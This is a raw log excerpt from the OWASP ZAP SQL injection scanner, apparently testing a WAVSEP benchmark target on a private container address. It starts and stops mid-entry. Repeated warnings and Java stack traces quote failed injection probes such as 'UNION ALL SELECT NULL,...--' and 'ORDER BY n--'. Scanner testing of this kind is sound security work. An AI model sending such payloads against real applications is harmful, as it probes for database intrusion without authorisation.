NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681424 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681425 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681426 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681426 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681427 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681428 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 5510-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 5510-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681429 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 7948-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// ORDER BY 7948-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681430 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681430 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681431 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681431 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681433 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681433 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload 